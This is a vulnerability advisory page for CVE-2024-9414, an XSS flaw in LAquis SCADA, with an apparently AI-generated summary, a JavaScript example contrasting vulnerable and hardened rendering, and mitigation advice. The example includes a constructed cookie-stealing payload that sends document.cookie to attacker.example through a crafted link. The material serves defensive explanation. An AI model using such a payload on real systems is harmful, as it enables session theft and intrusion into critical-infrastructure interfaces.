VYPR
High severity · NVD Advisory · Published Oct 17, 2024 · Updated Apr 15, 2026

CVE-2024-9414

Description

In LAquis SCADA version 4.7.1.511, a cross-site scripting vulnerability could allow an attacker to inject arbitrary code into a web page. This could allow an attacker to steal cookies, redirect users, or perform unauthorized actions.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

LAquis SCADA 4.7.1.511 contains a cross-site scripting flaw: user-supplied input is rendered into a web page without neutralization, letting an attacker inject script that can steal cookies, redirect users, or perform unauthorized actions in the victim's session.

Vulnerability Overview

LAquis SCADA version 4.7.1.511 contains a cross-site scripting (XSS) vulnerability in its web interface, classified under CWE-79 as Improper Neutralization of Input During Web Page Generation [1]. The flaw stems from insufficient sanitization of user-supplied input before it is rendered in a web page, allowing an attacker to inject arbitrary HTML or JavaScript code [1].
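The CWE-79 pattern described above, shown as an added example rather than LAquis SCADA's own code: a minimal server-side page renderer that reflects a query parameter into HTML, beside a hardened version that escapes it at output time. The route `/tag`, the parameter `name`, the host names and the constructed payload are all assumptions for illustration only; the security headers are generic defense-in-depth, not the vendor's patch.

```javascript
// Added example (not LAquis SCADA code). Route "/tag", parameter "name", the
// host names and the payload below are constructed for illustration only.

// Vulnerable: untrusted input is concatenated straight into the HTML response.
function renderTagPageVulnerable(tagName) {
  return `<html><body><h1>Tag: ${tagName}</h1></body></html>`;
}

// Escape the characters that can break out of text or attribute context.
// Doing this at output time is the neutralization CWE-79 calls for.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Hardened: every untrusted value passes through escapeHtml before rendering.
function renderTagPageHardened(tagName) {
  return `<html><body><h1>Tag: ${escapeHtml(tagName)}</h1></body></html>`;
}

// Server side of the exchange: pull the reflected parameter out of the
// requested URL and hand it to whichever renderer is in use.
function handleRequest(requestUrl, renderer) {
  const tagName = new URL(requestUrl).searchParams.get("name") || "";
  return renderer(tagName);
}

// Attacker side: a crafted link carrying the payload, of the kind the victim
// would be lured into opening while holding a valid session.
function craftedLink(baseUrl, payload) {
  return `${baseUrl}?name=${encodeURIComponent(payload)}`;
}

// Stand-in for "would a browser execute this?": is there a live <script>
// element in the rendered document? Escaped markup (&lt;script&gt;) is inert.
function containsLiveScript(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Defense-in-depth response headers that limit what a successful XSS can do:
// HttpOnly keeps the session cookie out of document.cookie, and a strict CSP
// refuses inline script. Generic hardening, not the vendor's fix.
function securityHeaders(sessionId) {
  return {
    "Content-Security-Policy":
      "default-src 'self'; script-src 'self'; object-src 'none'",
    "Set-Cookie": `session=${sessionId}; HttpOnly; Secure; SameSite=Strict`,
  };
}

// Constructed payload: the cookie-theft case the advisory describes.
const PAYLOAD =
  '<script>fetch("https://attacker.example/?c="+document.cookie)</script>';
const LINK = craftedLink("https://scada.example/tag", PAYLOAD);

// Runs both renderers against the crafted link and reports the outcome.
function demo() {
  return {
    link: LINK,
    vulnerableExecutes: containsLiveScript(handleRequest(LINK, renderTagPageVulnerable)),
    hardenedExecutes: containsLiveScript(handleRequest(LINK, renderTagPageHardened)),
    hardenedHtml: handleRequest(LINK, renderTagPageHardened),
  };
}

console.log(demo());
```

The escaping must happen where the value is written into the page, not on input: the same tag name may be rendered in HTML text, in an attribute, or in a JavaScript string, and each context needs its own encoder. The headers help even after a patch is applied, because an `HttpOnly` cookie cannot be read by injected script, which removes the cookie-theft path the advisory highlights.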

Exploitation Prerequisites

The vulnerability can be exploited remotely over a network with low attack complexity, requiring user interaction but no privileges (CVSS v3.1 vector AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N) [1]. An attacker could craft a malicious link or input that, when processed by an authenticated user's browser, executes attacker-controlled scripts within the context of the affected SCADA web application [1].

Potential Impact

Successful exploitation enables an attacker to steal session cookies—potentially leading to account takeover—redirect users to malicious sites, or perform unauthorized actions on behalf of the victim [1]. Because the software is used in critical infrastructure sectors such as energy, water, and chemicals, the impact can extend to operational technology environments if the web interface is exposed [1].

Mitigation Status

LCDS has released version 4.7.1.611 (and newer) to address the vulnerability; upgrading is strongly recommended [1]. Until patching is complete, CISA advises minimizing network exposure of SCADA systems, isolating control networks with firewalls, and restricting remote access [1]. No evidence of active exploitation has been reported at the time of publication, though the vulnerability is remotely exploitable with low complexity [1].

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.



References

1
